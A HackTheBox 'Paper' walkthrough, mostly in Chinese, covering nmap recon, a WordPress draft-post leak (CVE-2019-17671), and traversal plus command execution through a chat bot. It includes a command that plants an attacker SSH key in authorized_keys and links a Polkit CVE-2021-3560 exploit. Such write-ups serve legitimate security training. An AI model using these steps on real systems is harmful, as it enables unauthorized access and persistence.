--- title: 'Paper' disqus: hackmd tags: HTB --- [TOC] # Overall ## Used Skill - wpscan - read document ## Rating - ⭐⭐⭐☆☆☆☆☆☆☆ # Recon ## nmap ``` ~$ sudo nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.143 Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-17 22:16 CST Nmap scan report for 10.10.11.143 Host is up (0.40s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.0 (protocol 2.0) | ssh-hostkey: | 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA) | 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA) |_ 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519) 80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9) | http-methods: |_ Potentially risky methods: TRACE |_http-title: HTTP Server Test Page powered by CentOS |_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28 |_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9 443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9) |_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9 |_ssl-date: TLS randomness does not represent time |_http-title: HTTP Server Test Page powered by CentOS |_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28 | http-methods: |_ Potentially risky methods: TRACE | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US | Subject Alternative Name: DNS:localhost.localdomain | Not valid before: 2021-07-03T08:52:34 |_Not valid after: 2022-07-08T10:32:34 | tls-alpn: |_ http/1.1 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.92%E=4%D=3/17%OT=22%CT=1%CU=38374%PV=Y%DS=2%DC=T%G=Y%TM=6233430 OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)SEQ OS:(SP=105%GCD=1%ISR=10B%TI=Z%CI=Z%TS=A)OPS(O1=M505ST11NW7%O2=M505ST11NW7%O OS:3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST11NW7%O6=M505ST11)WIN(W1=7120%W2= OS:7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M505NNSN OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Network Distance: 2 hops TRACEROUTE (using port 554/tcp) HOP RTT ADDRESS 1 399.30 ms 10.10.14.1 2 399.15 ms 10.10.11.143 ``` ## Get virtual host name - 80 port 跑 Apache，進去是 default 頁面，查看 header 可以看到後端主機名 `office.paper`  - 將 Host 改成 office.paper 就可以進入正確頁面，該頁面是 Wordpress # Wordpress - wpscan 開掃 - 使用 [CVE-2019-17671](https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/)，瀏覽 `http://office.paper/?static=1` 出現  得到註冊網址 `http://chat.office.paper/register/8qozr226AhkCHZdyY` # Get Shell - 註冊後到 general 會看到一個奇怪的 bot - 可以跑 `recyclops list` 列目錄和 `recyclops file` 讀檔，這些指令有目錄穿越的問題 - `recyclops list ../../../../home/dwight/hubot` 找到 bot 檔案，查看文檔可以知道 bot 對話指令檔放在 `scripts` 底下，從 `scripts/run.js` 可以知道有個 `recyclops RUN` 可以跑任何指令 - 寫 ssh key 拿 shell ``` recyclops RUN echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDuXAKp6lilCgdGpsrip1Zx8Ex+wC8Y9OlElgzsCs2gyh2RleVA26cwq2uLwF+O4lVtLunxGbvcN97gCVKb+EstkjSRmMkhCrmb7hRO3mvvul770f2333iMcd4xtQCTBXbYjdFdR7IQAp8p9iSrYUeyU/LnKMFeboKRY4kFhIuSvavy5mflJalTKq+BhGZd3DCKHk+cbH4FLcoMy9hTy3Js+zaw28Td+Lo4oTm2LP/W2w/wopgCy5FWv531udIYT8AQxX47IOSloRqOeRfyX3SV9jdXVv0AutPq1REykxW14Clv2xbR/ddQfcCmbMBSp8lXpR+tkhDNdk82rawaX7HJMmJAY+g/QEgoEePOEfppawCsFwdzTdAoTCU2kfl6CNx3rB+F9CAP8Twgom5Mt/lYPi2N/ZEhRo2OCK9Sx5PZx79UAHnO0WeQc5BWeUYJrBacBuvnaFCejcJHFP5LNti5xMI1FvmNMwlFO7+PsmIZnZfSxbhg9FP/y1ixD3eoymk= eethan1@Magdalene2" > /home/dwight/.ssh/authorized_keys ``` # Privilege Escalation - 執行 `linpeas.sh`，試了各種 exp，最後是 [Polkit-exploit - CVE-2021-3560](https://github.com/Almorabea/Polkit-exploit)。其他人寫的 exp 失敗，只有這個 python 版本的成功